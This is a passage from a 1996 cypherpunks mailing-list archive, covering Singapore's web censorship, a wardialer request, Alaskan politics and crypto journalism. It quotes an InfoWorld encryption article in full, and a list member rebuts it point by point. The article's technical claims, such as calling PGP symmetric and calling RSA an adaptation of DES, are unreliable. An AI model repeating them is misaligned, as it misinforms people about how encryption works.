          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Seng <jseng@pobox.org.sg>
Date: Mon, 2 Sep 1996 09:21:59 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <ae4dc381000210043ce5@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960902061444.12103A-100000@icg.irdu.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Timothy C. May wrote:
> The point is to make clear to them that the Usenet and similar Web sites
> are global in nature, not subject to censorship without a very high local
> cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> Singaporans will have to choose not to carry the various newsgroups into
> which *I* post such messages!

Just let to add my comment in regard to this unforuntate discusssion.

To understand the sitution better, you should not impose America 
idealogy and perspection on how things to be done to Singapore. Singapore 
maybe young but there are certain culture too.

Most importantly, the move to censor certain WWW site actually comes as a 
relieve to many people, especially parents who worried about the bad 
influence of it. We can go into the same discussion about whose 
responsibilty it is but before you do that, please bear in mind that this 
is Singapore. As an example of what i mean, few years back, when they 
introduced R rating movies uncensored in Singapore for people above 18, 
it cause a surge in soft-porn movie to be screened. There is a general 
dissatifaction among the people and the government was force to shift the 
age limit to 21. And then later revised the R rating to R(A), where A stands 
for artistic which rules out soft-porn. It may be surprising but many
people (in Singapore) do welcome censorship sad to say.

In addition, you need to see the method of censorship deployed in
Singapore. For press media like papers and magazine, it is done in a
passive manner. They _do not_ read every issue of every magazine available
in Singapore. They only do so when there is enough complains. For example,
the incident of "Wired" banning due to the article "Disney with a Death
Penalty" was prompted by complains by the public before action is done. 
(This is related to me by some frens of mine working in the ministry who
is directly involved in the incident). Similarly, they are deploying the
same method to WWW. 

One more point. They know it is impossible to censor everything. It is
possible for me to order Wired directly from US. But still they do it. To
quote, "We are doing it for the sake of doing it. The intention is to make
it difficult to access to such information although we know it is
impossible to prevent all." (I may missed some words but the idea is
that). I have a long argument with this person, telling him that despite
what they have done, i could still access to those stuff which they ban.
his reasoning is "how many people can do it? 10%? 5%? That's fine with us.
If the people really wans it, they can get it". 

In actual fact, the move to put all people on proxy was not a surprise to 
many of us. The first time i know of such an intention was in Aug 95, 
which is one year back. They _have_ been doing studies and testing since 
then. The ISPs have been well informed and have been doing their own 
testing too since then.

I am writting this based on an experience in Singapore for more than 12 
yrs (Yes, i am not a Singaporean). if you wish to rebuke the points which 
i mention above, please feel free to do so but do so in the context wrt 
Singapore culture. Do not impose the general idealogy and culture within 
your country into your argument. (Oh yea, dont give me the "Bull shit! 
This fren of mine so-and-so have said that ....". We talking about 
general idealogy of the people, not of a single person)

Lastly, do _not_ misunderstood that i support the censorship. I never do 
and never will. Nor do i really feels that what they doing are right.  
There are some people like me who disapproved the moves but the voice is 
really too small to make a difference...yet.

> To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> and his feeble son, they can't. Except by pulling the plugs on forums in
> which my posts are carried. I consider this a Good Thing (that politicians
> in Country A generally have no power to tell citizen-units in Country B
> what they can say and what they can't).

Now, what makes you think that citizen of Country A has the power or 
rights to tell politicians of Country B what to do and what they cannot do?
Just wondering.

ps: Sorry for the off-topic discussion.

-James Seng




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 2 Sep 1996 23:10:20 +0800
To: James Seng <jseng@pobox.org.sg>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au>
Message-ID: <322AD535.3E6C@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


James Seng wrote:
> 
> I am not interested in politics so i didnt really know what is 
> happening in that case. for that, i have no comment.

Gee, James, have you paused to wonder whether the presence of a truly
free press might make it really difficult for a smart person like 
yourself to *not* find out about political prisoners?



______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 2 Sep 1996 12:48:55 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <1.5.4.32.19960902014136.002fc4b4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 31/08/96 -0700, Timothy C. May wrote:

> If discussions of Lee Kwan Yew's dynasty are considered illegal, then
>Singaporans will have to choose not to carry the various newsgroups into
>which *I* post such messages!

How long do you propose to carry on doing that? Soon, the others
in the newsgroups will be asking you very impolitely to stop,
just as you would if someone kept on and on posting such stuff to cypherpunks.

>At 6:35 AM 8/31/96, Arun Mehta wrote:
>>Then again, inappropriate postings are the bane of the Internet: the consensus
>>on which the Net functions relies heavily on people not posting
>>inappropriately.

>This works imperfectly, as all long-time surfers of the Usenet will attest!

True, but Usenet only functions because it works most of the
time. To the extent we subvert this consensus, we damage Usenet,
make it less useful. It shouldn't happen that in trying to save
or spread Usenet, we have to destroy it...

>And _never_ has it involved determinations of "inappropriate" by
>_governments_!

There I'm with you -- I'm merely suggesting that you find a way
to protest Singapore's actions in a manner that would be less
objectionable to most Internet users, in Singapore and outside.

>The point of being sometimes "impolite" (*) is to "force their hand."

I never said anything about politeness -- the appropriateness I
was talking about was in the context of what the people posting
to a discussion group consider proper material for them to
receive, not what the government of Singapore thinks.

In any case, I think we may be slightly going off track as far as
the current Singapore problem is concerned. They are blocking
access to certain web sites from mid September -- Usenet isn't
part of the current discussion, far as I know.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 2 Sep 1996 22:22:05 +0800
To: cypherpunks@toad.com
Subject: Re: wardialer
Message-ID: <TCPSMTP.16.9.2.7.42.54.2645935021.683810@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > Does any body know where I can get a half decent war dialer.
 > 

 In> Use a websearch utility, and stop posting to cryptography-based
 In> mailing  lists.

 Someone should shoot that kid and put US out of OUR misery... :)


 P.J.
 pjn@nworks.com



... Nothing is opened more often by mistake than YOUR mouth.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 2 Sep 1996 23:30:05 +0800
To: cypherpunks@toad.com
Subject: The AI-who???
Message-ID: <v03007844ae504b3872f2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


An admittedly leftist interpretation of recent Alaskan electorial events, for those fans of the Alaskan Independance Party...

Cheers,
Bob Hettinga


--- begin forwarded text


From: sxaeg@aurora.alaska.edu (GREENWALT ART E) (by way of rah@shipwright.com (Robert A. Hettinga))
To: rah@shipwright.com
Subject: The AI-who???
Organization: University of Alaska Fairbanks
Path: news-central.tiac.net!news-in.tiac.net!uunet!in3.uu.net!brighton.openmarket.com!decwrl!news.alaska.edu!aurora.alaska.edu!sxaeg
Newsgroups: alt.culture.alaska
Date: 29 Aug 1996 01:07:38 GMT
Lines: 35
NNTP-Posting-Host: aurora.alaska.edu
X-Newsreader: TIN [version 1.2 PL2]
X-Newsreader: Yet Another NewsWatcher 2.1.2

  Okay, okay...I know everyone has been sitting on the edge of their 
privy seats wondering how the Rent-A-Party (aka "The Sub-Arctic Titanic 
of Politics") fared in the recent primaries here in the Interior, so here 
goes.
  
  Now, keep something in mind as you read these results:  the Interior is 
the heart of the Rent-A-Party.  Der Fuhrer Vogel "graced" us with his 
presence and as the infirmities of advancing age took their toll, he 
devised the party back in the mid-70's here in the Interior.  So...you 
should think the bastion, the stronghold, Yea, Brethren and Sistren!, the 
very for-r-r-r-rtress of AIP-ity would be...the INTERIOR!
  Amen!
  
  The AIP fielded 1 candidate here on the Fairbanks ballots:  Paul 
Chizmar.  
  He finished last.
  Indeed, surpassing even the last performance of the party when they 
dropped from their 1990 high of 39% of the vote to their 1994 basement 
13% of the vote, we now see them seeking subterranean levels as their 
sole candidate on the entire ballot received *barely* 11% of the vote!
  Right here!  In the Interior!  Just about 15 miles from Lynette and 
Dexter Clarke, the penultimate-Grand Poobahs of Das Partie!
  
  Tsk....
  
  I tell ya, folks...I love to watch "Rocky and Bullwinkle", "Monty 
Python", "The 3 Stooges", the "Little Rascals", etc.  But when the AIP 
finally dwindles/splinters/transmogrifies into its final bit of light and 
then that little glimmer goes out....I will have lost one of my greatest 
sources of amusement Alaska has ever offered me.
  Sigh....
  
 .....Art, who will just have to watch more 3 Stooges and see if he can 
tell which one is Joe...

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 2 Sep 1996 23:01:52 +0800
To: James Seng <cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <2.2.32.19960902124403.00ae6430@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:06 AM 9/2/96 +0800, James Seng wrote:
>that). I have a long argument with this person, telling him that despite
>what they have done, i could still access to those stuff which they ban.
>his reasoning is "how many people can do it? 10%? 5%? That's fine with us.
>If the people really wans it, they can get it". 

The flaw with this view is that it is no harder to deploy software that
defeats Singapore's proxy than it is to establish a tcp/ip connection in the
first place.  For civilians (such as myself) establishing a tcp/ip
connection is as hard or as easy as establishing an encrypted tcp/ip tunnel
to defeat government control efforts.  For both these tasks, I am dependent
on software writers who know more than I do.  Since the software of the Net
is written by people not governments, the governments will find it hard to
hold "free users" down to a 5% or 10% figure.  The Net is nothing more than
the software that it runs on and we (not governments) write the software.

In addition, we are not imposing our ideology on Singapore.  If Singapore
changes, it will be because an encounter with the realities of the free flow
of information changes it.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 2 Sep 1996 23:23:31 +0800
To: cypherpunks@toad.com
Subject: "Always make new mistakes"
Message-ID: <199609021248.IAA84818@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Esther Dyson sigfiled:

...

> Esther Dyson				Always make new mistakes!

OK, but must we always be trying to make the same *old* ones, only
in a new medium? <sigh> At least there's still EPIC (for now, I'm
wondering when _they_ decide to cave?). I'm feeling pessimistic.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy &
Weekend Winsock Wemailer Opewator.

"Whoever would overthrow the liberty of a nation must begin
 by subduing the freeness of speech." -- Benjamin Franklin

 Defeat the Duopoly!             Stop the Browne-out!
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMirUhG1lp8bpvW01AQHR3QQAl9EvaUOCHnTZ0eyIa+kv41fXDJMsOC0v
BUGKvnz3rfVxRTS3JiHALB93Kc1F+kSjoOd7ftM42Pod4bsreSAHJ0CInJ2Q8iYS
r7Y2/opiY139YonF4WsD6IPTMA2Hfip9t8EACu0v2jIvxSCBqwa84WVrAxCijS9t
qfKK8d3Xw9g=
=6tBV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Tue, 3 Sep 1996 02:39:57 +0800
To: cypherpunks@toad.com
Subject: Terrible story on crypto in InfoWorld
Message-ID: <199609021327.JAA06854@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a story covering crypto in this weeks' InfoWorld
Electric. Since it's a members-only thing, I'll include the text here,
as well as my response to it. I'm hoping that they'll take the article
down and take up my offer to provide a better replacement.

I suspect that the problem here is that someone was given a subject
and a deadline, and told to "go for it." The requisite background for
getting clued on crypto is probably significantly longer than the
amount of time allowed by the deadline. I suspect that the issue was
further clouded by the crypto-clued people she talked to during the
research speaking directly about what they're doing, without giving
any sort of analogies to make the ideas click and make sense. I hope
that my illustration of the bicycle lock serves to clear up the
confusion...

In any event, we've all got a lot of work to do. I think we should
take it upon ourselves to not only talk about crypto and why it's such
a Good Thing(tm), but also to *educate* people to help them understand
what in the world we're talking about. 

-matt

------------------------ begin silly article -------------------------
[Image] [PageOne]  [Search]  [Reader Service]  [Ads Services]  [Overview Map]
 [Todays News Logo]            [Opinions]         [Forums]
                               [Test Center]      [Calendar]
                               [This Week In Print[Week In Review]

  Encryption technology can help secure private data over public
  carriers, but tackling its own issues is another story

  By Julie Bort
  InfoWorld Electric

  Think about this: Every time one of your end-users sends an
  electronic communication from your network, it opens the door
  to an attack. It is unbelievably easy for a knowledgeable
  hacker to exploit the failings of SMTP and other communications
  protocols to eavesdrop on Internet e-mail, send phony messages,
  or even gain access to other networked systems, security
  consultants say. A domain name or single IP address is the only
  information needed, and from there the door is wide open for
  other mischief.

  One increasingly popular way to plug this gaping hole is to
  encrypt e-mail and other electronic communications. Encryption
  is a way to encode text using complex mathematical algorithms.

  "When explaining encryption, I like to use the analogy of the
  Cap'n Crunch Super Secret Decoder Rings. These rings
  [distributed in Cap'n Crunch cereal boxes in the 1960s]
  contained a very simple algorithm. It was something like `take
  a letter then add 5.' So an A became an F. Simply speaking,
  that's all these algorithms are, mathematical formulas,"
  explains Gary Fresen, a member of the American Bar
  Association's committee on digital signatures and an attorney
  and partner at Baker McKenzie LLP, in Chicago, one of the
  world's largest law firms.

  Although no encryption algorithm is in and of itself
  crack-proof, several of them are so complex that they are
  virtually unbreakable. Coupled with proper implementation,
  authentication, and secure connections, encryption solutions
  can add a high level of security to any company's arsenal.
  However, it is an area that requires a knowledgeable person to
  make the purchasing decision because the technology is very
  complex, the best product selected will add a level of
  administration overhead, and numerous industry consortiums are
  developing competing APIs.

  NUMEROUS USES. Is encryption security overkill? Absolutely not,
  say users who have already adopted it or are in the processing
  of adopting it. One reason is to gain some security control
  over public telecommunications lines used in wide area
  networks.

  "We have a good idea of our internal security, but we also use
  the public carriers for our worldwide WAN, such as CompuServe
  [Inc.'s] frame relay and British Telecom [Plc.'s] frame relay,
  and we [don't control] their level of security," says Richard
  Perlotto, corporate network security manager for VLSI
  Technology Inc., in Tempe, Ariz.

  "Even if you own most of your own equipment, with frame relay
  you don't own the router, the carrier does. Frequently [the
  carrier has] modems attached to those routers to manage the
  equipment remotely," Perlotto adds.

  Those modems can allow hackers to tap in and grab data as it is
  being transmitted, without ever being detected by the company's
  security systems.

  Consequently, VLSI is currently evaluating encryption boxes and
  other products that sit on either end of a connection, such as
  NetFortress from Digital Secured Networks Technology Inc.
  (DSN), in Englewood Cliffs, N.J. One box encodes all traffic on
  the fly when it's being transmitted, and the other decodes the
  information upon receipt. Router vendors offer similar add-ons.

  Besides simply letting employees sleep better at night with the
  knowledge that their corporate secrets are safe, encryption
  technology can mean that a company can operate more efficiently
  and cost-effectively, users say.

  "Right now, we drop letters into the post office, which isn't
  very secure when you think about it," Fresen says. "After all,
  anyone could look at them. Or we send a courier. But if we can
  secure our [Lotus Development Corp.] cc:Mail system, there's a
  tremendous cost savings to us compared to sending a courier to
  Hong Kong three times a day. And we'll be able to do things in
  a day that used to take a week." Fresen is currently testing
  Entrust 2.0 from Northern Telecom Ltd. (NorTel), in Research
  Triangle Park, N.C., as an encryption add-on to e-mail.

  GETTING KEYED IN. But before you can go out and purchase an
  encryption system, you need to do some serious homework.
  Encryption involves multiple technologies, competing protocols,
  and complex mathematics.

  You can start the learning process by understanding the two
  components that make up most encryption systems: the key and
  the certificate.

  The key is the algorithm or mathematical formula that encodes
  the message itself. It must be sent to the message recipient so
  the message can be decoded, hence the term key.

  The size of the key, measured in bits, determines how complex
  the algorithm is and how tough the code is to crack. The state
  of the art for encryption technology used exclusively within
  the United States is 1,024 bits. However, the maximum size key
  that is allowed to be exported is 40 bits.

  Keys come in two flavors: symmetrical, or public key model; and
  asymmetrical, or public key/private key model.

  A symmetrical key uses the same algorithm to encode and decode
  a message. This is the technique used by the public key
  encryption program Pretty Good Privacy (PGP).

  PGP assumes what security experts call the peer trust model.
  That is, the sender knows and trusts the receiver and is
  therefore perfectly comfortable in sending the key on its way.
  Herein lies the "pretty good" part of the privacy. Although the
  algorithm itself makes the message difficult to crack, the key
  exchange is only pretty good when compared with other methods.

  On the other hand, the great advantage to PGP is that it
  creates no key management overhead, which is the biggest
  drawback of asymmetrical keys.

  In the asymmetrical model, users have a public key stored
  somewhere that is available. Should someone want to send an
  encrypted message, the sender locates the public key of the
  recipient, encodes the message, and sends it off. The receiver
  then uses a private key to decode the message. The private key
  is different from the public key, but they are mathematically
  linked so that the private key is capable of decoding the
  message.

  Asymmetrical systems require no trust between the sender and
  the recipient. That's good. But they do create administration
  overhead in the form of storing and maintaining public and
  private keys.

  Public/private key exchange is the technique used by RSA Data
  Security Inc., which was recently sold to Security Dynamics
  Inc., in Bedford, Mass. RSA uses a technology that is actually
  an adaptation of the decade-old National Institute of Standards
  and Technology's peer-trust Data Encryption Standard (DES),
  still used in many products. DES is a method of grabbing random
  keys for each encryption task, rather than using the same key
  repeatedly. Cryptographers say that RSA solves some problems,
  such as the trust issue but generates others.

  "Say I want to send a secure message. The first thing I do is
  take a random key and encrypt the message with it," says Paul
  Kocher, an independent cryptography consultant in Menlo Park,
  Calif., and one of the people responsible for discovering the
  flaw in the security of Netscape Communication Corp.'s Netscape
  Navigator.

  "But without that key, I won't know how to decode [the
  message], so I take an RSA public key and encrypt the random
  DES key with my recipient's public key. The recipient uses a
  private RSA key to decrypt the DES key. If it sounds
  convoluted, it is. RSA is very slow and cumbersome. DES is fast
  and efficient, but it doesn't give you the security of the
  public/private key system," Kocher explains.

  RSA remains one of the most well-known encryption technologies,
  but it is not, by far, the only public/private key exchange
  method currently in use.

  For example, other vendors use a competing version called
  Diffie-Hellman. It is a mathematically different implementation
  of the asymmetrical model, and it is the method employed by
  DSN's NetFortress.

  THE REAL YOU. Using public or public and private keys is the
  foundation of encryption, but keys can't verify a recipient's
  identity.

  "When you're talking about sending secured messages, there are
  two goals you've got. One is to make sure that the information
  stays confidential, and the other is that it does not get
  tampered with," Kocher says.

  Enter the certificate, also called the digital signature.
  Certificates act like an electronic driver's license. They
  authenticate that the receivers and senders are who they say
  they are.

  "The issue is trust. When we owned our own 3270 cabling, we
  trusted it, we worried less. Now I have someone at Daytona Co.
  that needs access to Chrysler Corp. across multiple networks.
  What sort of trust do I have?" asks Bob Maskowitz, technical
  support specialist for Chrysler, in Detroit, and a member of
  the Internet Architecture Board of the Internet Engineering
  Task Force (IETF). "I need to authenticate that this person is
  allowed to update [a document]."

  Certificates can be created and managed by a third party, such
  as VeriSign Inc., in Mountain View, Calif., or they can be
  created and managed internally, with products such as NorTel's
  Entrust, which also performs encryption. Once a certificate is
  obtained, it becomes the user's digital signature.

  When digitally signing something, the recipient of the
  signature gets all of the information contained on the
  certificate, such as who the person is, the person's address,
  or other items chosen to be included on the certificate. The
  digital signature also says who granted the certificate, when
  it expires, and what level of verification was done.

  "There are three classes of certificates," explains Gina
  Jorasch, director of product marketing for VeriSign. "In Class
  1, we check for a unique name, that the e-mail address is
  correct, and that the person receiving it has authority to
  access that e-mail account. In Class 2, we check the name,
  address, driver's license, social security number, and date of
  birth. For a Class 3 we check all of those things, plus we
  check against the Equifax [credit reporting bureau] database."

  Although certificates provide the invaluable service of
  authenticating users, organizations that care enough about
  their security to use encryption and certificates may not want
  to trust an outsider to handle them, according to users.

  "Do you think Ford [Motor Co.] or Chrysler is going to let
  someone else control their certificates? Then there is this
  issue of where did you get your certificate from? Am I going to
  let you query my database to get a key? No way," Maskowitz
  says.

  From a network management perspective, certificates are also an
  issue. Unless they are outsourced, they will add a significant
  amount of system management overhead to an encryption system,
  even with systems such as Entrust that include management
  features.

  Most certificates are set to expire in a set amount of time,
  such as a year. Someone will have to see that they get
  reissued. Someone will also have to make sure that certificates
  for employees who leave a company are revoked and that new
  employee certificates are issued.

  SMIME'S THE WORD. The final area of concern IS managers face is
  the new wave of protocols being spewed out by various industry
  consortiums. Numerous APIs are being created that cover all the
  aspects of using encryption.

  Although these APIs are posing as standards, in truth the two
  most popular APIs for the commercial sector are merely vehicles
  for the mass adoption of a particular company's key technology.

  Nevertheless, vendors of products such as e-mail packages are
  lining up behind them.

  The four big protocols being worked on are Secure Multipurpose
  Internet Mail Extensions (SMIME), Multipart Object Security
  Standard (MOSS), the next-generation version of PGP that allows
  asymmetrical key exchange, and Message Security Protocol, says
  Rik Drummond, chairman of the IETF's electronic data
  interchange over the Internet committee and president of The
  Drummond Group, a consultancy in Fort Worth, Texas, that helps
  corporations choose and implement networking and security
  systems.

  MOSS is the API for the Department of Defense, and it will be
  mandatory for anyone in the government or anyone who does
  business with it.

  But commercially, SMIME and PGP, Version 3.0, are more robust
  choices, Drummond says, and they offer features best-suited for
  the commercial sector, such as backward compatibility, and
  better key and certificate management capabilities.

  By far the biggest names in the Internet world have lined up
  behind SMIME, including Microsoft Corp., which intends to make
  Microsoft Exchange SMIME-compliant; Netscape; and Qualcomm
  Inc., maker of the Eudora e-mail package.

  That makes it a comforting set of protocols to choose because
  corporations that buy products with SMIME or that purchase
  SMIME toolkits for customer applications will know that they
  will be able to communicate with the vast majority of others
  through a de facto standard. Those using other protocols will
  be left talking to themselves.

  Still, SMIME, as it stands now, isn't a panacea. Among its
  problems is that "the signature is exposed outside the
  encryption envelope," Maskowitz says.

  Also, once a message is encrypted with someone else's public
  key, the sender of the message can't open the message to make
  changes, Maskowitz adds.

  The architects of SMIME haven't completed the APIs yet, so
  there is some possibility that these problems will be fixed but
  in all likelihood not in time to be included in the first crop
  of SMIME-compliant applications, due to start rolling out this
  fall.

  Even with such serious issues still up in the air, today's
  encryption and certification products can offer a great deal of
  protection, especially if the Internet or a wide area intranet
  is becoming a serious business tool for a particular
  organization, and it can't wait for a de facto standard to
  emerge.

  For those with the time to wait, the learning curve should be
  ascended now. Mass adoption of encryption technology is a
  virtual certainty. Those that ignore it will find their secrets
  being blabbed to the world.

  --------------------------------
  Uses for encryption technology:

     * Sending sensitive data over publicly owned wide area
       links;
     * Sending sensitive data over Internet e-mail;
     * Electronic commerce;
     * Electronic data interchange over the Internet;
     * Order entry/order status over an intranet or the Internet;
     * Automated access to personnel files;
     * Storing sensitive data online;
     * Distribution, newsgroup style, of sensitive data.

  --------------------------------

  Will the export of strong encryption be allowed?

  One of the problems with adopting encryption worldwide is that
  the federal government severely restricts its export. In fact,
  encryption technology is classified as munitions.

  Therefore, U.S. encryption vendors and corporations are
  forbidden from exporting and deploying versions that use more
  than a 40-bit key. However, companies in other countries, such
  as Japan, can freely sell encryption technology that uses the
  tougher 1,024-bit standard.

  The U.S. government isn't completely closing its eyes to the
  matter. In July, Vice President Al Gore unveiled a proposal
  that would create a key-escrow system allowing keys greater
  than 40 bits to be exported but requiring a third party to keep
  a copy of a key that could be used by law enforcement
  officials. (See U.S. considers easing encryption export laws.)

  And this past June, the Senate Subcommittee on Technology,
  Science, and Space heard a slew of testimony from encryption
  vendors and other experts on the problem. In fact, there are
  several bills pending in both houses of Congress that would
  relax the current export restrictions. The Security and Freedom
  Through Encryption Act was introduced in the House by Rep.
  Robert Goodlatte, R-Va. Meanwhile, The Encrypted Communications
  Privacy Act of 1996 was introduced in the Senate by Sen.
  Patrick Leahy, D-Vt., and the Promotion of Commerce On-Line in
  the Digital Era Act of 1996 also sits before the Senate.

  All three laws would relax the 40-bit restriction on keys as
  well as eliminate other restrictions on international use and
  development of encryption.

  Officials of U.S. corporations look forward to these changes
  and believe that such changes would improve their ability to
  compete in the international marketplace.

  "We're an international company, so we can't use the domestic
  version of Netscape [Communications Corp.'s Netscape
  Navigator]. And we can't trust the data using the international
  versions," says Richard Perlotto, corporate network security
  manager at VLSI Technology Inc., in Tempe, Ariz.

  Julie Bort is a free-lance writer based in Dillon, Colo.


Please direct your comments to InfoWorld Electric News Editor Dana Gardner.

                                  [Image]

                To respond to this review, go to the forum.

                            [Image]     [Image]

               Copyright (c) 1996 InfoWorld Publishing Company
------------------------- end silly article --------------------------

--------------------------- begin response ---------------------------
-----BEGIN PGP SIGNED MESSAGE-----


This references
http://www.infoworld.com/cgi-bin/displayStory.pl?960830.crypt.htm

Hi,

First of all, I'd like to commend InfoWorld for covering a very
important topic: cryptography. There are, however, some very
significant flaws in the story, which I hope will be corrected
soon. As the article exists now, the information is sufficiently
incorrect to be more harm than if the article didn't exist at
all. Anyone using it as a guide will be only further confused.

The quotes are indented two spaces, with my comments below...

  Although no encryption algorithm is in and of itself
  crack-proof, several of them are so complex that they are
  virtually unbreakable. Coupled with proper implementation,
  authentication, and secure connections, encryption solutions
  can add a high level of security to any company's arsenal.
  However, it is an area that requires a knowledgeable person to
  make the purchasing decision because the technology is very
  complex, the best product selected will add a level of
  administration overhead, and numerous industry consortiums are
  developing competing APIs.

Also, there are a lot of people who simply don't know what they're
doing when it comes to cryptography and security. Many products claim
high degrees of security, but are hardly strong enough to keep
someone's kid sister from deciphering the message.

  The key is the algorithm or mathematical formula that encodes
  the message itself. It must be sent to the message recipient so
  the message can be decoded, hence the term key.

Bzzzt. The formula is the algorithm. The key is a piece of data (often
times, a passphrase, or a relatively small file) that is fed to the
algorithm along with the data to be encrypted or decrypted to produce
the desired result. The idea being that if an attacker knows what
algorithm someone is using, and they have the encrypted message,
they'll not be able to break the message unless they can also get
their hands on the key. Hence, the key needs to be sufficiently large
such that it can't be easily guessed by an attacker trying keys at
random (or by effectively starting at "1" and working his way up.)

  The size of the key, measured in bits, determines how complex
  the algorithm is and how tough the code is to crack. The state
  of the art for encryption technology used exclusively within
  the United States is 1,024 bits. However, the maximum size key
  that is allowed to be exported is 40 bits.

Bzzzt. The complexity of the algorithm and key size are two different
matters entirely. The level of complexity, by the way, typically
increases the chance for error (in both algorithm design and
implementation) more than adding any levels of security. A secure
algorithm doesn't have to be complex. However, its key must be of
sufficient length to be "computationally infeasable to break."

Let's take the example of a bicycle combination lock. It has a chain
which will secure the bicycle to a rack; we'll assume that it's some
newfangled sort of chain which is resistant to bolt cutters and all of
those sorts of things. The security of this lock now rests in the
actual locking mechanism. It's a very simple tumbler lock, perhaps
having three or four digits between 0 and 9 that collectively make up
the combination. The "key" is the combination in this case. The lock
is simple, but it can be difficult to break, if the length of the key
is long enough. If there is only one digit, there are 10 possible
(10**1) keys. An attacker can quickly guess this and have a new
bicycle. However, each time a digit is added to the key, it increases
the number of combinations an order of magnitude. Two digits will have
100 possible (10**2) keys, three digits will have 1000 (10**3), four
will have 10,000 (10**4) possible, etc.

The key size necessary to prevent breaking the solution will depend on
your attacker. I mentioned the term "computationally infeasable"
earlier. The term simply means that more time and money would need to
be spent in breaking the key than the value of that which it locks. If
a bike combination has 10**8 (100,000,000) possible combinations, and a
thief can try 60 combinations per minute, it would take 165 weeks of
continuous attempts to try every combination. By that time, enough
lawns could be cut to buy two such bikes.

Because computers are binary, we work in bases of two, instead of base
10, which the bicycle combination lock uses, but the principle is the
same. Each time you add a digit, you increase the number of keys by an
order of magnitude (in a binary system, that means you double it, in
a base 10 system, you increase it 10 times.) The key size of your
algorithm, therefore, must be large enough to prevent an attacker from
having any benefit to recovering that which is encrypted.

  Keys come in two flavors: symmetrical, or public key model; and
  asymmetrical, or public key/private key model.

Symmetric cryptosystems are sometimes known as "conventional."
Asymmetric cryptosystems are known as "public key" ciphers. (Public
key/private key *is* the public key model, and an asymmetric cipher!)

Symmetric ciphers require the same key to encrypt and decrypt. If you
imagine the encryption formula on the left side, and decryption on the
right, you apply the same key to both sides in order to encrypt or
retrieve the plaintext. Hence, the name "symmetric." Systems which use
a different key to encrypt from the key to decrypt, therefore, are
asymmetrical.

The note about key sizes is also misleading: conventional
cryptosystems require a much, much smaller key for security than do
public key cryptosystems. Because the math is different, a 128 bit key
on a conventional algorithm is roughly the same security as a 2304 bit
asymmetric cipher key. The "state of the art" in symmetric
cryptosystems is about 128 bits. In this type of system, the
government does not allow export of keys greater than 40 bits. Using a
1024 bit key in a symmetric cipher would provide an insane level of
security, but would also be very, very slow to use.

  A symmetrical key uses the same algorithm to encode and decode
  a message. This is the technique used by the public key
  encryption program Pretty Good Privacy (PGP).

This is wrong, I will explain later.

  PGP assumes what security experts call the peer trust model.
  That is, the sender knows and trusts the receiver and is
  therefore perfectly comfortable in sending the key on its way.
  Herein lies the "pretty good" part of the privacy. Although the
  algorithm itself makes the message difficult to crack, the key
  exchange is only pretty good when compared with other methods.

VERY WRONG! I'll explain this also later.

  On the other hand, the great advantage to PGP is that it
  creates no key management overhead, which is the biggest
  drawback of asymmetrical keys.

